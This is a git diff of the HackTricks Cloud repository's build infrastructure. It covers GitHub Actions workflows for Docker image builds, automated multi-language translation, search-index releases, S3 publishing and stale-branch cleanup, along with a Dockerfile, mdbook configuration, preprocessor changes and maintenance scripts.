Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction.
In any case, thanks for contributing to HackTricks!
## HackTricks 培训
如果你提交 PR 是为了通过 [ARTE certification](https://hacktricks-training.com/courses/arte) 考试并以 2 flags 代替 3 flags你需要将 PR 命名为 `arte-<username>``grte-<username>``azrte-<username>`,具体取决于你参加的认证。
另外,请记住,仅进行语法/句法修正不会被接受作为减少考试 flag 的理由。
无论如何,感谢你为 HackTricks 做出的贡献!

56
.github/workflows/build_docker.yml vendored Normal file
View File

@@ -0,0 +1,56 @@
name: Build and Push Docker Image
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- 'book/**'
workflow_dispatch:
concurrency: build_docker
permissions:
packages: write
id-token: write
contents: write
jobs:
build-and-push:
runs-on: ubuntu-latest
steps:
# 1. Check out the repository to get the Dockerfile
- name: Check out code
uses: actions/checkout@v3
with:
fetch-depth: 0
# 2. Log into GitHub Container Registry
- name: Log in to GHCR
uses: docker/login-action@v2
with:
registry: ghcr.io
username: ${{ github.actor }}
password: ${{ secrets.GITHUB_TOKEN }}
# 3. Build and push
- name: Build and push Docker image
run: |
# Define image name
IMAGE_NAME=ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image
# Build Docker image
docker build -t $IMAGE_NAME:latest .
# Push Docker image to GHCR
docker push $IMAGE_NAME:latest
# Set image visibility to public
curl -X PATCH \
-H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/packages/container/translator-image/visibility \
-d '{"visibility":"public"}'

View File

@@ -14,12 +14,15 @@ on:
concurrency: build_master
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
steps:
@@ -27,32 +30,65 @@ jobs:
uses: actions/checkout@v4
with:
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
# Install Rust and Cargo
- name: Install Rust and Cargo
uses: actions-rs/toolchain@v1
with:
toolchain: stable
override: true
# Install mdBook and Plugins
- name: Install mdBook and Plugins
run: |
cargo install mdbook
cargo install mdbook-alerts
cargo install mdbook-reading-time
cargo install mdbook-pagetoc
cargo install mdbook-tabs
cargo install mdbook-codename
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=en mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
# Cat hacktricks-preprocessor.log
#- name: Cat hacktricks-preprocessor.log
# run: cat hacktricks-preprocessor.log
- name: Install GitHub CLI
run: |
curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \
&& sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \
&& echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \
&& sudo apt update \
&& sudo apt install gh -y
- name: Publish search index release asset
shell: bash
env:
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
run: |
set -euo pipefail
ASSET="book/searchindex.js"
TAG="searchindex-en"
TITLE="Search Index (en)"
if [ ! -f "$ASSET" ]; then
echo "Expected $ASSET to exist after build" >&2
exit 1
fi
TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
if [ -z "$TOKEN" ]; then
echo "No token available for GitHub CLI" >&2
exit 1
fi
export GH_TOKEN="$TOKEN"
# Delete the release if it exists
echo "Checking if release $TAG exists..."
if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
echo "Release $TAG already exists, deleting it..."
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || {
echo "Failed to delete release, trying without cleanup-tag..."
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || {
echo "Warning: Could not delete existing release, will try to recreate..."
}
}
sleep 2 # Give GitHub API a moment to process the deletion
else
echo "Release $TAG does not exist, proceeding with creation..."
fi
# Create new release (with force flag to overwrite if deletion failed)
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || {
echo "Failed to create release, trying with force flag..."
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true
sleep 2
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
}
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3

204
.github/workflows/cleanup_branches.yml vendored Normal file
View File

@@ -0,0 +1,204 @@
name: Cleanup Merged/Closed PR Branches
on:
schedule:
- cron: '0 2 * * 0' # Every Sunday at 2 AM UTC
workflow_dispatch: # Allow manual triggering
inputs:
dry_run:
description: 'Dry run (show what would be deleted without actually deleting)'
required: false
default: 'false'
type: boolean
permissions:
contents: write
pull-requests: read
jobs:
cleanup-branches:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
with:
fetch-depth: 0 # Need full history to see all branches
token: ${{ secrets.PAT_TOKEN }}
- name: Install GitHub CLI
run: |
curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \
&& sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \
&& echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \
&& sudo apt update \
&& sudo apt install gh -y
- name: Configure git
run: |
git config --global user.email "action@github.com"
git config --global user.name "GitHub Action"
- name: Cleanup merged/closed PR branches
env:
GH_TOKEN: ${{ secrets.PAT_TOKEN }}
run: |
echo "Starting branch cleanup process..."
# Check if this is a dry run
DRY_RUN="${{ github.event.inputs.dry_run || 'false' }}"
if [ "$DRY_RUN" = "true" ]; then
echo "🔍 DRY RUN MODE - No branches will actually be deleted"
echo ""
fi
# Define protected branches and patterns
protected_branches=(
"master"
"main"
)
# Translation branch patterns (any 2-letter combination)
translation_pattern="^[a-zA-Z]{2}$"
# Get all remote branches except protected ones
echo "Fetching all remote branches..."
git fetch --all --prune
# Get list of all remote branches (excluding HEAD)
all_branches=$(git branch -r | grep -v 'HEAD' | sed 's/origin\///' | grep -v '^$')
# Get all open PRs to identify branches with open PRs
echo "Getting list of open PRs..."
open_pr_branches=$(gh pr list --state open --json headRefName --jq '.[].headRefName' | sort | uniq)
echo "Open PR branches:"
echo "$open_pr_branches"
echo ""
deleted_count=0
skipped_count=0
for branch in $all_branches; do
branch=$(echo "$branch" | xargs) # Trim whitespace
# Skip if empty
if [ -z "$branch" ]; then
continue
fi
echo "Checking branch: $branch"
# Check if it's a protected branch
is_protected=false
for protected in "${protected_branches[@]}"; do
if [ "$branch" = "$protected" ]; then
echo " ✓ Skipping protected branch: $branch"
is_protected=true
skipped_count=$((skipped_count + 1))
break
fi
done
if [ "$is_protected" = true ]; then
continue
fi
# Check if it's a translation branch (any 2-letter combination)
# Also protect any branch that starts with 2 letters followed by additional content
if echo "$branch" | grep -Eq "$translation_pattern" || echo "$branch" | grep -Eq "^[a-zA-Z]{2}[_-]"; then
echo " ✓ Skipping translation/language branch: $branch"
skipped_count=$((skipped_count + 1))
continue
fi
# Check if branch has an open PR
if echo "$open_pr_branches" | grep -Fxq "$branch"; then
echo " ✓ Skipping branch with open PR: $branch"
skipped_count=$((skipped_count + 1))
continue
fi
# Check if branch had a PR that was merged or closed
echo " → Checking PR history for branch: $branch"
# Look for PRs from this branch (both merged and closed)
pr_info=$(gh pr list --state all --head "$branch" --json number,state,mergedAt --limit 1)
if [ "$pr_info" != "[]" ]; then
pr_state=$(echo "$pr_info" | jq -r '.[0].state')
pr_number=$(echo "$pr_info" | jq -r '.[0].number')
merged_at=$(echo "$pr_info" | jq -r '.[0].mergedAt')
if [ "$pr_state" = "MERGED" ] || [ "$pr_state" = "CLOSED" ]; then
if [ "$DRY_RUN" = "true" ]; then
echo " 🔍 [DRY RUN] Would delete branch: $branch (PR #$pr_number was $pr_state)"
deleted_count=$((deleted_count + 1))
else
echo " ✗ Deleting branch: $branch (PR #$pr_number was $pr_state)"
# Delete the remote branch
if git push origin --delete "$branch" 2>/dev/null; then
echo " Successfully deleted remote branch: $branch"
deleted_count=$((deleted_count + 1))
else
echo " Failed to delete remote branch: $branch"
fi
fi
else
echo " ✓ Skipping branch with open PR: $branch (PR #$pr_number is $pr_state)"
skipped_count=$((skipped_count + 1))
fi
else
# No PR found for this branch - it might be a stale branch
# Check if branch is older than 30 days and has no recent activity
last_commit_date=$(git log -1 --format="%ct" origin/"$branch" 2>/dev/null || echo "0")
if [ "$last_commit_date" != "0" ] && [ -n "$last_commit_date" ]; then
# Calculate 30 days ago in seconds since epoch
thirty_days_ago=$(($(date +%s) - 30 * 24 * 60 * 60))
if [ "$last_commit_date" -lt "$thirty_days_ago" ]; then
if [ "$DRY_RUN" = "true" ]; then
echo " 🔍 [DRY RUN] Would delete stale branch (no PR, >30 days old): $branch"
deleted_count=$((deleted_count + 1))
else
echo " ✗ Deleting stale branch (no PR, >30 days old): $branch"
if git push origin --delete "$branch" 2>/dev/null; then
echo " Successfully deleted stale branch: $branch"
deleted_count=$((deleted_count + 1))
else
echo " Failed to delete stale branch: $branch"
fi
fi
else
echo " ✓ Skipping recent branch (no PR, <30 days old): $branch"
skipped_count=$((skipped_count + 1))
fi
else
echo " ✓ Skipping branch (cannot determine age): $branch"
skipped_count=$((skipped_count + 1))
fi
fi
echo ""
done
echo "=================================="
echo "Branch cleanup completed!"
if [ "$DRY_RUN" = "true" ]; then
echo "Branches that would be deleted: $deleted_count"
else
echo "Branches deleted: $deleted_count"
fi
echo "Branches skipped: $skipped_count"
echo "=================================="
# Clean up local tracking branches (only if not dry run)
if [ "$DRY_RUN" != "true" ]; then
echo "Cleaning up local tracking branches..."
git remote prune origin
fi
echo "Cleanup process finished."

195
.github/workflows/translate_all.yml vendored Normal file
View File

@@ -0,0 +1,195 @@
name: Translator All
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
permissions:
packages: write
id-token: write
contents: write
jobs:
translate:
name: Translate → ${{ matrix.name }} (${{ matrix.branch }})
runs-on: ubuntu-latest
environment: prod
# Run N languages in parallel (tune max-parallel if needed)
strategy:
fail-fast: false
# max-parallel: 3 #Nothing to run all in parallel
matrix:
include:
- { name: "Afrikaans", language: "Afrikaans", branch: "af" }
- { name: "German", language: "German", branch: "de" }
- { name: "Greek", language: "Greek", branch: "el" }
- { name: "Spanish", language: "Spanish", branch: "es" }
- { name: "French", language: "French", branch: "fr" }
- { name: "Hindi", language: "Hindi", branch: "hi" }
- { name: "Italian", language: "Italian", branch: "it" }
- { name: "Japanese", language: "Japanese", branch: "ja" }
- { name: "Korean", language: "Korean", branch: "ko" }
- { name: "Polish", language: "Polish", branch: "pl" }
- { name: "Portuguese", language: "Portuguese", branch: "pt" }
- { name: "Serbian", language: "Serbian", branch: "sr" }
- { name: "Swahili", language: "Swahili", branch: "sw" }
- { name: "Turkish", language: "Turkish", branch: "tr" }
- { name: "Ukrainian", language: "Ukrainian", branch: "uk" }
- { name: "Chinese", language: "Chinese", branch: "zh" }
# Ensure only one job per branch runs at a time (even across workflow runs)
concurrency:
group: translate-${{ matrix.branch }}
cancel-in-progress: false
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
env:
LANGUAGE: ${{ matrix.language }}
BRANCH: ${{ matrix.branch }}
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Update and download scripts
run: |
sudo apt-get update
# Install GitHub CLI properly
curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \
&& sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \
&& echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \
&& sudo apt update \
&& sudo apt install gh -y \
&& sudo apt-get install -y wget
wget -O /tmp/get_and_save_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/get_and_save_refs.py
wget -O /tmp/compare_and_fix_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/compare_and_fix_refs.py
wget -O /tmp/translator.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/translator.py
- name: Run get_and_save_refs.py
run: |
python /tmp/get_and_save_refs.py
- name: Download language branch & update refs
run: |
pwd
ls -la
git config --global --add safe.directory "$GITHUB_WORKSPACE"
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
python /tmp/compare_and_fix_refs.py --files-unmatched-paths /tmp/file_paths.txt
git add .
git commit -m "Fix unmatched refs" || echo "No changes to commit"
git push || echo "No changes to push"
- name: Run translation script on changed files
run: |
git checkout master
cp src/SUMMARY.md /tmp/master-summary.md
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n ",$file" >> /tmp/file_paths.txt
fi
done
echo "Files to translate:"
cat /tmp/file_paths.txt
echo ""
echo ""
touch /tmp/file_paths.txt
if [ -s /tmp/file_paths.txt ]; then
python /tmp/translator.py \
--language "$LANGUAGE" \
--branch "$BRANCH" \
--api-key "$OPENAI_API_KEY" \
-f "$(cat /tmp/file_paths.txt)" \
-t 3
else
echo "No markdown files changed, skipping translation."
fi
- name: Sync SUMMARY.md from master
run: |
git checkout "$BRANCH"
git pull
if [ -f /tmp/master-summary.md ]; then
cp /tmp/master-summary.md src/SUMMARY.md
git add src/SUMMARY.md
git commit -m "Sync SUMMARY.md with master" || echo "SUMMARY already up to date"
git push || echo "No SUMMARY updates to push"
else
echo "master summary not exported; failing"
exit 1
fi
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Publish search index release asset
shell: bash
env:
PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
run: |
set -euo pipefail
ASSET="book/searchindex.js"
TAG="searchindex-${BRANCH}"
TITLE="Search Index (${BRANCH})"
if [ ! -f "$ASSET" ]; then
echo "Expected $ASSET to exist after build" >&2
exit 1
fi
TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
if [ -z "$TOKEN" ]; then
echo "No token available for GitHub CLI" >&2
exit 1
fi
export GH_TOKEN="$TOKEN"
# Delete the release if it exists
if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
echo "Release $TAG already exists, deleting it..."
gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY"
fi
# Create new release
gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY"
# Login in AWs
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-cloud/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

23
.github/workflows/upload_ht_to_ai.yml vendored Normal file
View File

@@ -0,0 +1,23 @@
name: Upload HackTricks to HackTricks AI
on:
workflow_dispatch:
schedule:
- cron: "0 5 1 * *"
jobs:
dowload-clean-push:
runs-on: ubuntu-latest
environment: prod
steps:
# 1. Download the script
- name: Dowload script
run: wget "https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/master/scripts/upload_ht_to_ai.py"
- name: Install pip dependencies
run: python3 -m pip install openai
# 2. Execute the script
- name: Execute script
run: export MY_OPENAI_API_KEY=${{ secrets.MY_OPENAI_API_KEY }}; python3 "./upload_ht_to_ai.py"

1
.gitignore vendored
View File

@@ -35,3 +35,4 @@ book
book/*
hacktricks-preprocessor.log
hacktricks-preprocessor-error.log
searchindex.js

31
Dockerfile Normal file
View File

@@ -0,0 +1,31 @@
# Use the official Python 3.12 Bullseye image as the base
FROM python:3.12-bullseye
# Install system dependencies
RUN apt-get update && apt-get install -y \
curl \
wget \
git \
sudo \
build-essential \
awscli
# Install Python libraries
RUN pip install --upgrade pip && \
pip install openai tqdm tiktoken
# Install Rust & Cargo
RUN curl https://sh.rustup.rs -sSf | sh -s -- -y
ENV PATH="/root/.cargo/bin:${PATH}"
# Install mdBook & plugins
RUN cargo install mdbook
RUN cargo install mdbook-alerts
RUN cargo install mdbook-reading-time
RUN cargo install mdbook-pagetoc
RUN cargo install mdbook-tabs
RUN cargo install mdbook-codename
# Set the working directory
WORKDIR /app

View File

@@ -1,34 +0,0 @@
# HackTricks Cloud
{{#include ./banners/hacktricks-training.md}}
<figure><img src="images/cloud.gif" alt=""><figcaption></figcaption></figure>
_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
> [!TIP]
> 欢迎来到这个页面,在这里你将找到我在 **CTFs**、**真实**生活**环境**、**研究**以及**阅读**研究和新闻中学到的与 **CI/CD & Cloud** 相关的每一个 **黑客技巧/技术/其他**。
### **Pentesting CI/CD Methodology**
**在 HackTricks CI/CD 方法论中,你将找到如何对与 CI/CD 活动相关的基础设施进行渗透测试。** 阅读以下页面以获取 **介绍:**
[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
### Pentesting Cloud Methodology
**在 HackTricks Cloud 方法论中,你将找到如何对云环境进行渗透测试。** 阅读以下页面以获取 **介绍:**
[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
### License & Disclaimer
**查看它们在:**
[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
### Github Stats
![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
{{#include ./banners/hacktricks-training.md}}

1
README.md Symbolic link
View File

@@ -0,0 +1 @@
src/README.md

View File

@@ -1,6 +1,7 @@
[book]
authors = ["HackTricks Team"]
language = "en"
multilingual = false
src = "src"
title = "HackTricks Cloud"
@@ -8,17 +9,26 @@ title = "HackTricks Cloud"
create-missing = false
extra-watch-dirs = ["translations"]
[preprocessor.alerts]
after = ["links"]
[preprocessor.reading-time]
[preprocessor.pagetoc]
[preprocessor.tabs]
[preprocessor.codename]
[preprocessor.hacktricks]
command = "python3 ./hacktricks-preprocessor.py"
env = "prod"
[output.html]
additional-css = ["theme/tabs.css", "theme/pagetoc.css"]
additional-css = ["theme/pagetoc.css", "theme/tabs.css"]
additional-js = [
"theme/tabs.js",
"theme/pagetoc.js",
"theme/tabs.js",
"theme/ht_searcher.js",
"theme/sponsor.js",
"theme/ai.js"
@@ -26,7 +36,6 @@ additional-js = [
no-section-label = true
preferred-dark-theme = "hacktricks-dark"
default-theme = "hacktricks-light"
hash-files = false
[output.html.fold]
enable = true # whether or not to enable section folding

View File

@@ -53,17 +53,11 @@ def ref(matchobj):
if href.endswith("/"):
href = href+"README.md" # Fix if ref points to a folder
if "#" in href:
result = findtitle(href.split("#")[0], book, "source_path")
if result is None or result[0] is None:
raise Exception(f"Chapter not found")
chapter, _path = result
chapter, _path = findtitle(href.split("#")[0], book, "source_path")
title = " ".join(href.split("#")[1].split("-")).title()
logger.debug(f'Ref has # using title: {title}')
else:
result = findtitle(href, book, "source_path")
if result is None or result[0] is None:
raise Exception(f"Chapter not found")
chapter, _path = result
chapter, _path = findtitle(href, book, "source_path")
logger.debug(f'Recursive title search result: {chapter["name"]}')
title = chapter['name']
except Exception as e:
@@ -71,17 +65,11 @@ def ref(matchobj):
dir = path.dirname(current_chapter['source_path'])
logger.debug(f'Error getting chapter title: {href} trying with relative path {path.normpath(path.join(dir,href))}')
if "#" in href:
result = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
if result is None or result[0] is None:
raise Exception(f"Chapter not found")
chapter, _path = result
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
title = " ".join(href.split("#")[1].split("-")).title()
logger.debug(f'Ref has # using title: {title}')
else:
result = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
if result is None or result[0] is None:
raise Exception(f"Chapter not found")
chapter, _path = result
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
title = chapter["name"]
logger.debug(f'Recursive title search result: {chapter["name"]}')
except Exception as e:
@@ -159,14 +147,8 @@ if __name__ == '__main__':
context, book = json.load(sys.stdin)
logger.debug(f"Context: {context}")
logger.debug(f"Book keys: {book.keys()}")
# Handle both old (sections) and new (items) mdbook API
book_items = book.get('sections') or book.get('items', [])
for chapter in iterate_chapters(book_items):
if chapter is None:
continue
for chapter in iterate_chapters(book['sections']):
logger.debug(f"Chapter: {chapter['path']}")
current_chapter = chapter
# regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}'

View File

@@ -0,0 +1,88 @@
#!/bin/bash
# Define the image folder and the root of your project
IMAGE_FOLDER="./src/images"
PROJECT_ROOT="."
# Move to the project root
cd "$PROJECT_ROOT" || exit
# Loop through each image file in the folder
find "$IMAGE_FOLDER" -type f | while IFS= read -r image; do
# Extract the filename without the path
image_name=$(basename "$image")
# If image file name contains "sponsor", skip it
if [[ "$image_name" == *"sponsor"* ]]; then
echo "Skipping sponsor image: $image_name"
continue
fi
if [[ "$image_name" == *"arte"* ]]; then
echo "Skipping arte image: $image_name"
continue
fi
if [[ "$image_name" == *"grte"* ]]; then
echo "Skipping grte image: $image_name"
continue
fi
if [[ "$image_name" == *"azrte"* ]]; then
echo "Skipping azrte image: $image_name"
continue
fi
if [[ "$image_name" == *"websec"* ]]; then
echo "Skipping sponsor image: $image_name"
continue
fi
if [[ "$image_name" == *"venacus"* ]]; then
echo "Skipping sponsor image: $image_name"
continue
fi
if [[ "$image_name" == *"CLOUD"* ]]; then
echo "Skipping sponsor image: $image_name"
continue
fi
if [[ "$image_name" == *"cloud.gif"* ]]; then
echo "Skipping sponsor image: $image_name"
continue
fi
if [[ "$image_name" == *"CH_logo"* ]]; then
echo "Skipping sponsor image: $image_name"
continue
fi
if [[ "$image_name" == *"lasttower"* ]]; then
echo "Skipping sponsor image: $image_name"
continue
fi
echo "Checking image: $image_name"
# Search for the image name using rg and capture the result
search_result=$(rg -F --files-with-matches "$image_name" \
--no-ignore --hidden \
--glob '!.git/*' \
--glob '!$IMAGE_FOLDER/*' < /dev/null)
echo "Search result: $search_result"
# If rg doesn't find any matches, delete the image
if [ -z "$search_result" ]; then
echo "Deleting unused image: $image"
rm "$image"
else
echo "Image used: $image_name"
echo "$search_result"
fi
done
echo "Cleanup completed!"

View File

@@ -0,0 +1,165 @@
#!/usr/bin/env python3
import argparse
import json
import re
from pathlib import Path
SRC_DIR = Path("./src")
REFS_JSON = Path("/tmp/refs.json")
# Matches content between {{#ref}} and {{#endref}}, including newlines, lazily
REF_RE = re.compile(r"{{#ref}}\s*([\s\S]*?)\s*{{#endref}}", re.MULTILINE)
def extract_refs(text: str):
"""Return a list of refs (trimmed) in appearance order."""
return [m.strip() for m in REF_RE.findall(text)]
def replace_refs_in_text(text: str, new_refs: list):
"""Replace all refs in text with new_refs, maintaining order."""
matches = list(REF_RE.finditer(text))
if len(matches) != len(new_refs):
return text # Can't replace if counts don't match
# Replace from end to beginning to avoid offset issues
result = text
for match, new_ref in zip(reversed(matches), reversed(new_refs)):
# Get the full match span to replace the entire {{#ref}}...{{#endref}} block
start, end = match.span()
# Format the replacement with proper newlines
formatted_replacement = f"{{{{#ref}}}}\n{new_ref}\n{{{{#endref}}}}"
result = result[:start] + formatted_replacement + result[end:]
return result
def main():
parser = argparse.ArgumentParser(description="Compare and fix refs between current branch and master branch")
parser.add_argument("--files-unmatched-paths", type=str,
help="Path to file where unmatched file paths will be saved (comma-separated on first line)")
args = parser.parse_args()
if not SRC_DIR.is_dir():
raise SystemExit(f"Not a directory: {SRC_DIR}")
if not REFS_JSON.exists():
raise SystemExit(f"Reference file not found: {REFS_JSON}")
# Load the reference refs from master branch
try:
with open(REFS_JSON, 'r', encoding='utf-8') as f:
master_refs = json.load(f)
except (json.JSONDecodeError, UnicodeDecodeError) as e:
raise SystemExit(f"Error reading {REFS_JSON}: {e}")
print(f"Loaded reference data for {len(master_refs)} files from {REFS_JSON}")
files_processed = 0
files_modified = 0
files_with_differences = 0
unmatched_files = [] # Track files with unmatched refs
# Track which files exist in current branch
current_files = set()
for md_path in sorted(SRC_DIR.rglob("*.md")):
rel = md_path.relative_to(SRC_DIR).as_posix()
rel_with_src = f"{SRC_DIR.name}/{rel}" # Include src/ prefix for output
files_processed += 1
# Track this file as existing in current branch
current_files.add(rel)
try:
content = md_path.read_text(encoding="utf-8")
except UnicodeDecodeError:
# Fallback if encoding is odd
content = md_path.read_text(errors="replace")
current_refs = extract_refs(content)
# Check if file exists in master refs
if rel not in master_refs:
if current_refs:
print(f"⚠️ NEW FILE with refs: {rel_with_src} (has {len(current_refs)} refs)")
files_with_differences += 1
unmatched_files.append(rel_with_src)
continue
master_file_refs = master_refs[rel]
# Compare ref counts
if len(current_refs) != len(master_file_refs):
print(f"📊 REF COUNT MISMATCH: {rel_with_src} -- Master: {len(master_file_refs)} refs, Current: {len(current_refs)} refs")
files_with_differences += 1
unmatched_files.append(rel_with_src)
continue
# If no refs in either, skip
if not current_refs and not master_file_refs:
continue
# Compare individual refs
differences_found = False
for i, (current_ref, master_ref) in enumerate(zip(current_refs, master_file_refs)):
if current_ref != master_ref:
if not differences_found:
print(f"🔍 REF DIFFERENCES in {rel_with_src}:")
differences_found = True
print(f" Ref {i+1}:")
print(f" Master: {repr(master_ref)}")
print(f" Current: {repr(current_ref)}")
if differences_found:
files_with_differences += 1
unmatched_files.append(rel_with_src)
# Replace current refs with master refs
try:
new_content = replace_refs_in_text(content, master_file_refs)
if new_content != content:
md_path.write_text(new_content, encoding="utf-8")
files_modified += 1
print(f" ✅ Fixed refs in {rel_with_src}")
else:
print(f" ❌ Failed to replace refs in {rel_with_src}")
except Exception as e:
print(f" ❌ Error fixing refs in {rel_with_src}: {e}")
# Check for files that exist in master refs but not in current branch
unexisted_files = 0
for master_file_rel in master_refs.keys():
if master_file_rel not in current_files:
rel_with_src = f"{SRC_DIR.name}/{master_file_rel}"
print(f"🗑️ {rel_with_src} (existed in master but not in current one)")
unexisted_files += 1
unmatched_files.append(rel_with_src)
# Save unmatched files to specified path if requested
if args.files_unmatched_paths and unmatched_files:
try:
unmatched_paths_file = Path(args.files_unmatched_paths)
unmatched_paths_file.parent.mkdir(parents=True, exist_ok=True)
with open(unmatched_paths_file, 'w', encoding='utf-8') as f:
f.write(','.join(list(set(unmatched_files))))
print(f"📝 Saved {len(unmatched_files)} unmatched file paths to: {unmatched_paths_file}")
except Exception as e:
print(f"❌ Error saving unmatched paths to {args.files_unmatched_paths}: {e}")
elif args.files_unmatched_paths and not unmatched_files:
# Create empty file if no unmatched files found
try:
unmatched_paths_file = Path(args.files_unmatched_paths)
unmatched_paths_file.parent.mkdir(parents=True, exist_ok=True)
unmatched_paths_file.write_text('\n', encoding='utf-8')
print(f"<EFBFBD> No unmatched files found. Created empty file: {unmatched_paths_file}")
except Exception as e:
print(f"❌ Error creating empty unmatched paths file {args.files_unmatched_paths}: {e}")
print(f"\n SUMMARY:")
print(f" Files processed: {files_processed}")
print(f" Files with different refs: {files_with_differences}")
print(f" Files modified: {files_modified}")
print(f" Non existing files: {unexisted_files}")
if unmatched_files:
print(f" Unmatched files: {len(unmatched_files)}")
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,38 @@
#!/usr/bin/env python3
import json
import re
from pathlib import Path
SRC_DIR = Path("./src")
REFS_JSON = Path("/tmp/refs.json")
# Matches content between {{#ref}} and {{#endref}}, including newlines, lazily
REF_RE = re.compile(r"{{#ref}}\s*([\s\S]*?)\s*{{#endref}}", re.MULTILINE)
def extract_refs(text: str):
"""Return a list of refs (trimmed) in appearance order."""
return [m.strip() for m in REF_RE.findall(text)]
def main():
if not SRC_DIR.is_dir():
raise SystemExit(f"Not a directory: {SRC_DIR}")
refs_per_path = {} # { "relative/path.md": [ref1, ref2, ...] }
for md_path in sorted(SRC_DIR.rglob("*.md")):
rel = md_path.relative_to(SRC_DIR).as_posix()
try:
content = md_path.read_text(encoding="utf-8")
except UnicodeDecodeError:
# Fallback if encoding is odd
content = md_path.read_text(errors="replace")
refs = extract_refs(content)
refs_per_path[rel] = refs # keep order from findall
